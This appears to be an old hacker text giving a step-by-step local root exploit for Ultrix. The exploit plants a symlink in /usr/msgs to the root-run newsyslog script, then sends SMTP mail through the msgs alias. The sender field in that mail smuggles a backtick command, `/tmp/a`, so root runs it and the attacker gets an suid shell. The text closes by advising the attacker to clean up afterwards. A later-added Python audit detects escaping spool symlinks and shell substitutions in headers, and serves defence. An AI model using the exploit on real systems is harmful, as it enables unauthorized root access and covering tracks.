DO NOT DISTRIBUTE THIS F***ING BUG. It works on Ultrix, and is one of the
few Ultrix bugs I have seen that still works. It might work on other
platforms too.

This bug has been fixed in OSF, but not in Ultrix.

It should also work on any system that has the msgs mail alias.

$ grep msgs /etc/aliases
msgs: "|/usr/ucb/msgs -s"

Ok, the first thing to do is look in the /usr/msgs directory (or whatever
directory the msgs files are kept in), and see what the next msgs
file will be (if there is 1 and 2, then the next one is pretty easy to figure
out).

Then, make an executable /tmp/a that, like, makes an suid shell (this is pretty
easy to do; if you can't do it, don't consider yourself a hacker).

By default, newsyslog executes every 6 days at 4 am, but it depends on the
setup in crontab. What it does is age the syslog file (to /usr/adm/syslog.1,
.2, ..., I think).

symlink /usr/msgs/<nextmsg> -> /usr/adm/newsyslog

$ telnet
telnet> o localhost 25
mail shit, version, etc
expn msgs
250 <"| /usr/ucb/msgs -s">
mail from: <`/tmp/a`>
rcpt to: msgs
data
doesn't matter what you put here
.
quit

So now, when it writes to /usr/msgs/<nextmsg>, it will overwrite
/usr/adm/newsyslog, and since /usr/adm/newsyslog is a shell script, it will
expand `/tmp/a` by executing /tmp/a AS ROOT, giving you an suid shell or
whatever /tmp/a does.

From there, just clean up after yourself.
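A defender-side audit for the two conditions the write-up depends on: a spool entry that is a symlink resolving outside the msgs directory, and a message header carrying a shell command substitution. This is an added example written for this page, not the author's code; the spool layout, the "outside-script" file and the /tmp/placeholder path are constructed sample data.

```python
import os
import re
import tempfile

# Command-substitution markers: if a spool file is ever read by a shell
# (the failure mode described above) these get expanded.
SHELL_SUBST = re.compile(r"`|\$\(")

def find_escaping_symlinks(spool_dir):
    """Spool entries that are symlinks resolving outside the spool directory."""
    spool_real = os.path.realpath(spool_dir)
    hits = []
    for name in sorted(os.listdir(spool_dir)):
        path = os.path.join(spool_dir, name)
        if not os.path.islink(path):
            continue
        target = os.path.realpath(path)
        if os.path.commonpath([spool_real, target]) != spool_real:
            hits.append((name, target))
    return hits

def find_suspicious_headers(spool_dir):
    """(file, header line) pairs whose header carries a shell substitution."""
    hits = []
    for name in sorted(os.listdir(spool_dir)):
        path = os.path.join(spool_dir, name)
        if os.path.islink(path) or not os.path.isfile(path):
            continue
        with open(path, errors="replace") as fh:
            for line in fh:
                if line.strip() == "":
                    break  # blank line ends the header block
                if SHELL_SUBST.search(line):
                    hits.append((name, line.rstrip("\n")))
    return hits

def build_demo_spool():
    """Constructed sample spool (not real data): two messages, two symlinks."""
    base = tempfile.mkdtemp()
    spool = os.path.join(base, "msgs")
    os.mkdir(spool)
    outside = os.path.join(base, "outside-script")  # stands in for a root-run script
    open(outside, "w").close()
    with open(os.path.join(spool, "1"), "w") as fh:
        fh.write("From: alice@example.test\nSubject: hi\n\nbody\n")
    with open(os.path.join(spool, "2"), "w") as fh:
        fh.write("From: <`/tmp/placeholder`>\nSubject: x\n\nbody\n")
    os.symlink(outside, os.path.join(spool, "3"))  # escapes the spool
    os.symlink(os.path.join(spool, "1"), os.path.join(spool, "4"))  # stays inside
    return spool
```

Run both checks over the real spool from cron; any hit in either list is worth a look before the next log rotation runs.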